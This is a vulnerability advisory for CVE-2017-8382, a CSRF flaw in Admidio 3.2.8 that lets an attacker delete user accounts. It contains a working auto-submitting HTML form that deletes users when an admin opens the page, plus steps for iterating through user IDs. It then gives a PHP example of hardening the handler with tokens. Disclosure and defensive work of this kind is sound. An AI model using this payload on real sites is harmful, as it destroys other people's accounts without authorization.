Admidio 3.2.8 - Cross-Site Request Forgery Vulnerability

Published: 15 May 2017 00:00:00 | Reported by: Faiz Ahmed Zaidi | Type: zdt | Source: 0day.today

Admidio 3.2.8 CSRF vulnerability allows deletion of user account

Related

Family | Title | Published | Source
Circl | CVE-2017-8382 | 28 Apr 2017 00:00 | circl
CNVD | Admidio Cross-Site Request Forgery Vulnerability (CNVD-2017-10374) | 16 May 2017 00:00 | cnvd
CVE | CVE-2017-8382 | 16 May 2017 10:00 | cve
Cvelist | CVE-2017-8382 | 16 May 2017 10:00 | cvelist
Exploit DB | Admidio 3.2.8 - Cross-Site Request Forgery | 28 Apr 2017 00:00 | exploitdb
EUVD | EUVD-2022-3509 | 3 Oct 2025 20:07 | euvd
exploitpack | Admidio 3.2.8 - Cross-Site Request Forgery | 28 Apr 2017 00:00 | exploitpack
Github Security Blog | admidio CSRF Vulnerability | 17 May 2022 02:42 | github
GitLab Advisory Database | Cross-Site Request Forgery (CSRF) | 17 May 2022 00:00 | gitlab
NVD | CVE-2017-8382 | 16 May 2017 10:29 | nvd
# Exploit Title :Admidio 3.2.8 (CSRF to Delete Users)
# Date: 28/April/2017
# Exploit Author: Faiz Ahmed Zaidi
# Organization: Provensec LLC
# Website: http://provensec.com/
# Vendor Homepage: https://www.admidio.org/
# Software Link: https://www.admidio.org/download.php
# Version: 3.2.8
# Tested on: Windows 10 (Xampp)
# CVE : CVE-2017-8382
 
 
[Suggested description]
Admidio 3.2.8 has CSRF in adm_program/modules/members/members_function.php with an impact of deleting arbitrary user accounts.
 
  ------------------------------------------
 
  [Additional Information]
  Using this crafted HTML form we are able to delete any user with admin/user privilege.
 
  <html>
    <body onload="javascript:document.forms[0].submit()">
      <form action="http://localhost/newadmidio/admidio-3.2.8/adm_program/modules/members/members_function.php">
        <input type="hidden" name="usr&#95;id" value='9' />
        <input type="hidden" name="mode" value="3" />
      </form>
    </body>
  </html>
 
[Affected Component]
  http://localhost/newadmidio/admidio-3.2.8/adm_program/modules/members/members_function.php
 
  ------------------------------------------
 
  [Attack Type]
  Remote
 
  ------------------------------------------
 
  [Impact Escalation of Privileges]
  true
 
  ------------------------------------------
 
  [Attack Vectors]
  Steps:
  1.) If a user with admin privilege opens a crafted HTML page or JPEG image, then
  both the admin and the users with user privilege whose user IDs are given in the
  crafted request (as shown below) are deleted.
 
   <input type="hidden" name="usr&#95;id" value='3' />
 
  2.) In Admidio, by default, user IDs start from '0': '1' is the system user and
  '2' onward are regular users, so an attacker can start from '2' up to 'n' users.
 
  3.) To delete the user permanently we select 'mode=3' (as shown below); then all
  admin/low-privileged users are deleted.
 
   <input type="hidden" name="mode" value="3" />
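
  The root cause the advisory describes is a state-changing handler that accepts its parameters (usr_id, mode) from any origin with nothing tying the request to a page the application itself rendered. The following is an added example of how such a handler is hardened; it is not Admidio's code and does not reproduce members_function.php. It assumes a session started by the application's own login code, a hypothetical $_SESSION['user_is_admin'] flag, and a hypothetical delete_user() routine; the parameter names usr_id and mode are taken from the advisory.

```php
<?php
// Added example (not Admidio's code): a hardened delete handler that keeps the
// parameters named in the advisory (usr_id, mode=3) but rejects forged
// cross-site requests with a per-session synchronizer token.
declare(strict_types=1);

// Defense in depth: a SameSite=Lax session cookie is not attached to
// cross-site form POSTs, so even a token-less bug is harder to exploit.
// (PHP 7.3+ accepts the array form of session_set_cookie_params.)
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);
session_start();

/** Return the per-session CSRF token, creating it on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Constant-time comparison of the submitted token against the session token. */
function csrf_token_is_valid(?string $submitted): bool
{
    if ($submitted === null || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

/** Stop the request with a plain-text error; nothing below is reached. */
function deny(int $status, string $message): void
{
    http_response_code($status);
    header('Content-Type: text/plain; charset=utf-8');
    echo $message;
    exit;
}

// 1. A state-changing action must not be reachable by GET. The advisory's
//    PoC form has no method attribute, so the browser submits it as GET.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    header('Allow: POST');
    deny(405, 'method not allowed');
}

// 2. The token must be present in the POST body and match the session.
//    A page on another origin cannot read the victim's session token, so a
//    forged form cannot supply a valid one, whatever method it uses.
if (!csrf_token_is_valid($_POST['csrf_token'] ?? null)) {
    deny(403, 'invalid or missing CSRF token');
}

// 3. Authorization is still enforced after the token check
//    ($_SESSION['user_is_admin'] is a hypothetical flag set at login).
if (empty($_SESSION['user_is_admin'])) {
    deny(403, 'administrator privilege required');
}

// 4. Validate the parameters before acting on them.
$usrId = filter_input(INPUT_POST, 'usr_id', FILTER_VALIDATE_INT,
    ['options' => ['min_range' => 1]]);
$mode  = filter_input(INPUT_POST, 'mode', FILTER_VALIDATE_INT);

if ($usrId === false || $usrId === null || $mode !== 3) {
    deny(400, 'bad request');
}

// delete_user() is a hypothetical placeholder for the application's own
// deletion routine; it runs only once every check above has passed.
delete_user($usrId);
```

  The legitimate delete form rendered by the application must carry the token as a hidden field, e.g. `<input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">`, and the handler's token check must come before any database access. Requiring POST on its own is not a fix: a cross-site page can just as easily submit a form with method="post", which is why the token and the SameSite cookie attribute are the controls that actually stop the forged request.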
 
  ------------------------------------------
 
  [Reference]
  https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
 
Thanks
Faiz Ahmed Zaidi

#  0day.today [2018-04-08]  #

Record updated: 15 May 2017 00:00 (current)
Vulners AI Score: 0.2 (low risk)
EPSS: 0.00645